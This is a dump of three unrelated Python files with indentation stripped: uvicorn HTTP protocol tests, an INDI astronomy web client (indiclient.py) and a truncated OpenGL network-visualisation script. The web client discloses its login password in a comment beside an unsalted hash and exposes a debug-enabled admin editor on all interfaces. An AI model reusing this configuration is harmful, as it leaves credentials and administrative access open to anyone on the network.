self.sockname = ("127.0.0.1", 8000) if sockname is None else sockname
self.peername = ("127.0.0.1", 8001) if peername is None else peername
self.sslcontext = sslcontext
self.closed = False
self.buffer = b""
self.read_paused = False
def get_extra_info(self, key):
return {
"sockname": self.sockname,
"peername": self.peername,
"sslcontext": self.sslcontext,
}.get(key)
def write(self, data):
assert not self.closed
self.buffer += data
def close(self):
assert not self.closed
self.closed = True
def pause_reading(self):
self.read_paused = True
def resume_reading(self):
self.read_paused = False
def is_closing(self):
return self.closed
def clear_buffer(self):
self.buffer = b""
def set_protocol(self, protocol):
pass
class MockLoop(asyncio.AbstractEventLoop):
def __init__(self, event_loop):
self.tasks = []
self.later = []
self.loop = event_loop
def is_running(self):
return True # pragma: no cover
def create_task(self, coroutine):
self.tasks.insert(0, coroutine)
return MockTask()
def call_later(self, delay, callback, *args):
self.later.insert(0, (delay, callback, args))
def run_one(self):
coroutine = self.tasks.pop()
self.run_until_complete(coroutine)
def run_until_complete(self, coroutine):
asyncio._set_running_loop(None)
try:
return self.loop.run_until_complete(coroutine)
finally:
asyncio._set_running_loop(self)
def close(self):
self.loop.close()
def run_later(self, with_delay):
later = []
for delay, callback, args in self.later:
if with_delay >= delay:
callback(*args)
else:
later.append((delay, callback, args))
self.later = later
class MockTask:
def add_done_callback(self, callback):
pass
@contextlib.contextmanager
def get_connected_protocol(app, protocol_cls, event_loop, **kwargs):
loop = MockLoop(event_loop)
asyncio._set_running_loop(loop)
transport = MockTransport()
config = Config(app=app, **kwargs)
server_state = ServerState()
protocol = protocol_cls(config=config, server_state=server_state, _loop=loop)
protocol.connection_made(transport)
try:
yield protocol
finally:
protocol.loop.close()
asyncio._set_running_loop(None)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_get_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
@pytest.mark.parametrize("path", ["/", "/?foo", "/?foo=bar", "/?foo=bar&baz=1"])
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_request_logging(path, protocol_cls, caplog, event_loop):
get_request_with_query_string = b"\r\n".join(
["GET {} HTTP/1.1".format(path).encode("ascii"), b"Host: example.org", b"", b""]
)
caplog.set_level(logging.INFO, logger="uvicorn.access")
logging.getLogger("uvicorn.access").propagate = True
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, log_config=None
) as protocol:
protocol.data_received(get_request_with_query_string)
protocol.loop.run_one()
assert '"GET {} HTTP/1.1" 200'.format(path) in caplog.records[0].message
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_head_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_HEAD_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" not in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_post_request(protocol_cls, event_loop):
async def app(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
response = Response(b"Body: " + body, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b'Body: {"hello": "world"}' in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive_timeout(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert not protocol.transport.is_closing()
protocol.loop.run_later(with_delay=1)
assert not protocol.transport.is_closing()
protocol.loop.run_later(with_delay=5)
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_close(protocol_cls, event_loop):
app = Response(b"", status_code=204, headers={"connection": "close"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"0\r\n\r\n" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_empty_body(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.buffer.count(b"0\r\n\r\n") == 1
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_head_request(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_HEAD_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_pipelined_requests(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_undersized_request(protocol_cls, event_loop):
app = Response(b"xxx", headers={"content-length": "10"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_oversized_request(protocol_cls, event_loop):
app = Response(b"xxx" * 20, headers={"content-length": "10"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_large_post_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(LARGE_POST_REQUEST)
assert protocol.transport.read_paused
protocol.loop.run_one()
assert not protocol.transport.read_paused
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(b"x" * 100000)
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_app_exception(protocol_cls, event_loop):
async def app(scope, receive, send):
raise Exception()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_exception_during_response(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"1", "more_body": True})
raise Exception()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_no_response_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
pass
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_partial_response_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_duplicate_start_message(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.start", "status": 200})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_missing_start_message(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.body", "body": b""})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_message_after_body_complete(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b""})
await send({"type": "http.response.body", "body": b""})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_value_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b""})
return 123
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_disconnect(protocol_cls, event_loop):
got_disconnect_event = False
async def app(scope, receive, send):
nonlocal got_disconnect_event
while True:
message = await receive()
if message["type"] == "http.disconnect":
break
got_disconnect_event = True
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.eof_received()
protocol.connection_lost(None)
protocol.loop.run_one()
assert got_disconnect_event
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_response(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(START_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
protocol.data_received(FINISH_POST_REQUEST)
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_read_after_response(protocol_cls, event_loop):
message_after_response = None
async def app(scope, receive, send):
nonlocal message_after_response
response = Response("Hello, world", media_type="text/plain")
await response(scope, receive, send)
message_after_response = await receive()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert message_after_response == {"type": "http.disconnect"}
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_http10_request(protocol_cls, event_loop):
async def app(scope, receive, send):
content = "Version: %s" % scope["http_version"]
response = Response(content, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(HTTP10_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Version: 1.0" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_root_path(protocol_cls, event_loop):
async def app(scope, receive, send):
path = scope.get("root_path", "") + scope["path"]
response = Response("Path: " + path, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(
app, protocol_cls, event_loop, root_path="/app"
) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Path: /app/" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_raw_path(protocol_cls, event_loop):
async def app(scope, receive, send):
path = scope["path"]
raw_path = scope.get("raw_path", None)
assert "/one/two" == path
assert b"/one%2Ftwo" == raw_path
response = Response("Done", media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(
app, protocol_cls, event_loop, root_path="/app"
) as protocol:
protocol.data_received(GET_REQUEST_WITH_RAW_PATH)
protocol.loop.run_one()
assert b"Done" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_max_concurrency(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, limit_concurrency=1
) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 503 Service Unavailable" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_request(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.shutdown()
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_idle(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.shutdown()
assert protocol.transport.buffer == b""
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_sent_when_body_consumed(protocol_cls, event_loop):
async def app(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
response = Response(b"Body: " + body, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
EXPECT_100_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Expect: 100-continue",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
protocol.data_received(EXPECT_100_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 100 Continue" in protocol.transport.buffer
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b'Body: {"hello": "world"}' in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_not_sent_when_body_not_consumed(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
EXPECT_100_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Expect: 100-continue",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
protocol.data_received(EXPECT_100_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 100 Continue" not in protocol.transport.buffer
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_unsupported_upgrade_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop, ws="none") as protocol:
protocol.data_received(UPGRADE_REQUEST)
assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
assert b"Unsupported upgrade request." in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_supported_upgrade_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, ws="wsproto"
) as protocol:
protocol.data_received(UPGRADE_REQUEST)
assert b"HTTP/1.1 426 " in protocol.transport.buffer
async def asgi3app(scope, receive, send):
pass
def asgi2app(scope):
async def asgi(receive, send):
pass
return asgi
asgi_scope_data = [
(asgi3app, {"version": "3.0", "spec_version": "2.3"}),
(asgi2app, {"version": "2.0", "spec_version": "2.3"}),
]
@pytest.mark.parametrize("asgi2or3_app, expected_scopes", asgi_scope_data)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_scopes(asgi2or3_app, expected_scopes, protocol_cls, event_loop):
with get_connected_protocol(asgi2or3_app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert expected_scopes == protocol.scope.get("asgi")
@pytest.mark.parametrize(
"request_line",
[
pytest.param(b"G?T / HTTP/1.1", id="invalid-method"),
pytest.param(b"GET /?x=y z HTTP/1.1", id="invalid-path"),
pytest.param(b"GET / HTTP1.1", id="invalid-http-version"),
],
)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http_request(request_line, protocol_cls, caplog, event_loop):
app = Response("Hello, world", media_type="text/plain")
request = INVALID_REQUEST_TEMPLATE % request_line
caplog.set_level(logging.INFO, logger="uvicorn.error")
logging.getLogger("uvicorn.error").propagate = True
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(request)
assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
assert b"Invalid HTTP request received." in protocol.transport.buffer
def test_fragmentation():
def receive_all(sock):
chunks = []
while True:
chunk = sock.recv(1024)
if not chunk:
break
chunks.append(chunk)
return b"".join(chunks)
app = Response("Hello, world", media_type="text/plain")
def send_fragmented_req(path):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 8000))
d = (
f"GET {path} HTTP/1.1\r\n" "Host: localhost\r\n" "Connection: close\r\n\r\n"
).encode()
split = len(path) // 2
sock.sendall(d[:split])
time.sleep(0.01)
sock.sendall(d[split:])
resp = receive_all(sock)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
return resp
config = Config(app=app, http="httptools")
server = Server(config=config)
t = threading.Thread(target=server.run)
t.daemon = True
t.start()
    time.sleep(1)  # wait for uvicorn to start
path = "/?param=" + "q" * 10
response = send_fragmented_req(path)
bad_response = b"HTTP/1.1 400 Bad Request"
assert bad_response != response[: len(bad_response)]
server.should_exit = True
t.join()
|
indiclient.py
|
#!/home/bernard/acenv/bin/python3
import os, threading, sys, hashlib, uuid, pathlib
from indi_mr import mqtttoredis, mqtt_server, redis_server, tools
from indiredis import make_wsgi_app
from skipole import WSGIApplication, FailPage, GoTo, ValidateError, ServerError, use_submit_list, skis
from waitress import serve
mqtt_host = mqtt_server(host='localhost', port=1883)
redis_host = redis_server(host='localhost', port=6379)
# This service needs a redis connection to store cookies
rconn = tools.open_redis(redis_host)
PROJ_DATA={"rconn":rconn, # redis connection
"username":"localcontrol", # the username which must be used to log in
"password": "6f852ab4bb9e13ac5095377eddb251a09afd27dbb95c788e075ca63860f9ce8cac75fa9165bb739c0e629f2be201ddf57f261ab982cfd7f88687412ff0d1ea64"
}
# The password above is a hashed password, being the result of running
# python3 hashpassword.py and copying the result here; the password is currently 'remscope'
# Set a directory of your choice where blobs will be stored
BLOBS = '/home/bernard/indiblobs'
PROJECTFILES = os.path.dirname(os.path.realpath(__file__))
PROJECT = "indiclient"
def _is_user_logged_in(skicall):
received_cookies = skicall.received_cookies
if PROJECT not in received_cookies:
return False
# get cookie
rconn = skicall.proj_data["rconn"]
# the current cookiestring is stored in redis at key 'cookiestring'
cookievalue = rconn.get('cookiestring')
if not cookievalue:
return False
cookiestring = cookievalue.decode('utf-8')
if received_cookies[PROJECT] != cookiestring:
return False
return True
def _hash_password(username, password):
"Return hashed password, as a string, on failure return None"
seed_password = username + password
hashed_password = hashlib.sha512( seed_password.encode('utf-8') ).hexdigest()
return hashed_password
def _create_cookie(skicall):
"Generates a random cookie, store it in redis, and return the cookie"
rconn = skicall.proj_data["rconn"]
# generate a cookie string
cookiestring = uuid.uuid4().hex
rconn.set('cookiestring', cookiestring, ex=3600) # expire after one hour
return cookiestring
def start_call(called_ident, skicall):
"When a call is initially received this function is called."
# to serve static files, you can map a url to a server static directory
# the user does not have to be logged in to access these
servedfile = skicall.map_url_to_server("images", "/home/bernard/indiblobs")
if servedfile:
return servedfile
if _is_user_logged_in(skicall):
# The user is logged in, so do not show the index page, or check login page
if (called_ident == (PROJECT, 1)) or (called_ident == (PROJECT, 10)):
# instead jump straight to indi client
return ('indiredis', 1)
# any other page, such as css or image files are ok
return called_ident
# You may wish to apply the decorator '@use_submit_list' to the submit_data
# function below. See the skipole documentation for details.
def submit_data(skicall):
"This function is called when a Responder wishes to submit data for processing in some manner"
if skicall.ident_list[-1] == (PROJECT, 10):
# this call is to checklogin from the login page
skicall.call_data['authenticate'] = False
username = skicall.proj_data["username"]
if (("login", "input_text1") in skicall.call_data) and (skicall.call_data["login", "input_text1"] == username):
if ("login", "input_text2") in skicall.call_data:
password = skicall.call_data["login", "input_text2"]
hashed = _hash_password(username, password)
if hashed == skicall.proj_data["password"]:
skicall.call_data['authenticate'] = True
if skicall.call_data['authenticate']:
return
else:
raise FailPage("Invalid input")
if skicall.ident_list[-1] == (PROJECT, 20):
# this call is to populate the showfiles page
serverpath = pathlib.Path(BLOBS)
serverfiles = [f.name for f in serverpath.iterdir() if f.is_file()]
if not serverfiles:
skicall.page_data['nothingfound', 'show'] = True
skicall.page_data['filelinks', 'show'] = False
return
skicall.page_data['nothingfound', 'show'] = False
skicall.page_data['filelinks', 'show'] = True
# The widget has links formed from a list of lists
# 0 : The url, label or ident of the target page of the link
# 1 : The displayed text of the link
# 2 : If True, ident is appended to link even if there is no get field
# 3 : The get field data to send with the link
serverfiles.sort(reverse=True)
filelinks = []
for sf in serverfiles:
# create a link to urlfolder/sf
filelinks.append([ "images/" + sf, sf, False, ""])
skicall.page_data['filelinks', 'nav_links'] = filelinks
return
if skicall.ident_list[-1] == (PROJECT, 30):
# this call is to log out
skicall.call_data['logout'] = True
return
def end_call(page_ident, page_type, skicall):
"""This function is called at the end of a call prior to filling the returned page with skicall.page_data,
it can also return an optional session cookie string."""
if ('authenticate' in skicall.call_data) and skicall.call_data['authenticate']:
# a user has logged in, set a cookie
return _create_cookie(skicall)
if ('logout' in skicall.call_data) and skicall.call_data['logout']:
# a user has been logged out, set a new random cookie in redis, and an invalid cookie in the client
_create_cookie(skicall)
return "xxxxxxxx"
return
def check_cookies_function(received_cookies, proj_data):
"""Returns None if call can proceed to sub project"""
if PROJECT not in received_cookies:
# no cookie, must go to top login page
return (PROJECT, 1)
# get cookie
rconn = proj_data["rconn"]
# the current cookiestring is stored in redis at key 'cookiestring'
cookievalue = rconn.get('cookiestring')
if not cookievalue:
return (PROJECT, 1)
cookiestring = cookievalue.decode('utf-8')
if received_cookies[PROJECT] != cookiestring:
# invalid cookie, return to top page
return (PROJECT, 1)
return
# The above functions are required as arguments to the skipole.WSGIApplication object
# and will be called as required.
# create the wsgi application
application = WSGIApplication(project=PROJECT,
projectfiles=PROJECTFILES,
proj_data=PROJ_DATA,
start_call=start_call,
submit_data=submit_data,
end_call=end_call,
url="/")
skis_application = skis.makeapp()
application.add_project(skis_application, url='/lib')
indi_application = make_wsgi_app(redis_host, blob_folder=BLOBS)
application.add_project(indi_application, url='/indi', check_cookies=check_cookies_function)
from skipole import skiadmin, set_debug
set_debug(True)
skiadmin_application = skiadmin.makeapp(editedprojname=PROJECT)
application.add_project(skiadmin_application, url='/skiadmin')
# serve the application with the python waitress web server in its own thread
webapp = threading.Thread(target=serve, args=(application,), kwargs={'host':'0.0.0.0', 'port':8000})
# and start it
webapp.start()
# and start mqtttoredis
mqtttoredis('indi_localclient', mqtt_host, redis_host, blob_folder=BLOBS)
|
start_tool.py
|
import logging
import threading
import time
from OpenGL.GL import *
from gui.constants import StatisticLink
from gui.ui_window import OptionGui
from opengl_helper.screenshot import create_screenshot
from processing.network_processing import NetworkProcessor
from utility.file import FileHandler
from utility.log_handling import setup_logger
from utility.performance import track_time
from utility.types import CameraPose
from utility.window import WindowHandler, Window
global options_gui
options_gui = OptionGui()
setup_logger("tool")
def compute_render(some_name: str):
global options_gui
width, height = 1920, 1200
FileHandler().read_statistics()
window_handler: WindowHandler = WindowHandler()
window: Window = window_handler.create_window()
window.set_callbacks()
window.activate()
logging.info("OpenGL Version: %d.%d" % (glGetIntegerv(GL_MAJOR_VERSION), glGetIntegerv(GL_MINOR_VERSION)))
network_processor: NetworkProcessor or None = None
@track_time(track_recursive=False)
def frame():
window_handler.update()
if "trigger_network_sample" in options_gui.settings and options_gui.settings["trigger_network_sample"] > 0:
network_processor.reset_edges()
options_gui.settings["trigger_network_sample"] = 0
if network_processor is not None:
network_processor.process(options_gui.settings["action_state"])
network_processor.render(window.cam, options_gui.render_config, options_gui.settings["show_class"])
if StatisticLink.SAMPLE_COUNT in options_gui.settings:
options_gui.settings[StatisticLink.SAMPLE_COUNT].set(network_processor.edge_processor.point_count)
if StatisticLink.EDGE_COUNT in options_gui.settings:
options_gui.settings[StatisticLink.EDGE_COUNT].set(network_processor.edge_processor.get_edge_count())
if StatisticLink.CELL_COUNT in options_gui.settings:
options_gui.settings[StatisticLink.CELL_COUNT].set(
network_processor.grid_processor.grid.grid_cell_count_overall)
if StatisticLink.PRUNED_EDGES in options_gui.settings:
options_gui.settings[StatisticLink.PRUNED_EDGES].set(network_processor.network.pruned_edges)
window.swap()
    while options_gui is None or (
            len(options_gui.settings["current_layer_data"]) == 0 and not options_gui.settings["Closed"]):
window_handler.update()
time.sleep(5)
if not options_gui.settings["Closed"]:
print("Start building network: " + str(options_gui.settings["current_layer_data"]))
network_processor = NetworkProcessor(options_gui.settings["current_layer_data"],
options_gui.processing_config,
importance_data=options_gui.settings["importance_data"],
processed_nn=options_gui.settings["processed_nn"])
window.cam.base = network_processor.get_node_mid()
window.cam.set_position(CameraPose.LEFT)
fps: float = 120
frame_count: int = 0
to_pause_time: float = 0
last_frame_count: int = 0
checked_frame_count: int = -1
check_time: float = time.perf_counter()
last_time: float = time.perf_counter()
while window.is_active() and not options_gui.settings["Closed"]:
if options_gui.settings["update_model"]:
options_gui.settings["update_model"] = False
network_processor.delete()
print("Rebuilding network: " + str(options_gui.settings["current_layer_data"]))
network_processor = NetworkProcessor(options_gui.settings["current_layer_data"],
options_gui.processing_config,
importance_data=options_gui.settings["importance_data"],
processed_nn=options_gui.settings["processed_nn"])
window.cam.base = network_processor.get_node_mid()
window.cam.set_position(CameraPose.LEFT)
frame()
if window.screenshot:
if "network_name" in options_gui.settings.keys():
create_screenshot(width, height, options_gui.settings["network_name"])
else:
create_screenshot(width, height)
window.screenshot = False
elif window.record:
window.frame_id += 1
if "network_name" in options_gui.settings.keys():
create_screenshot(width, height, options_gui.settings["network_name"], frame_id=window.frame_id)
else:
create_screenshot(width, height, frame_id=window.frame_id)
frame_count += 1
if time.perf_counter() - check_time > 1.0:
options_gui.settings[StatisticLink.FPS].set(float(
"{:.2f}".format(float(frame_count - checked_frame_count) / (time.perf_counter() - check_time))))
checked_frame_count = frame_count
check_time = time.perf_counter()
if "save_file" in options_gui.settings.keys() and options_gui.settings["save_file"]:
network_processor.save_model(options_gui.settings["save_processed_nn_path"])
options_gui.settings["save_file"] = False
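            # Frame limiter: accumulate the unused part of each frame's 1/fps
            # budget in to_pause_time and sleep it off once it exceeds 5 ms,
            # correcting last_time by the time actually spent sleeping.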
current_time: float = time.perf_counter()
elapsed_time: float = current_time - last_time
if elapsed_time < 1.0 / fps:
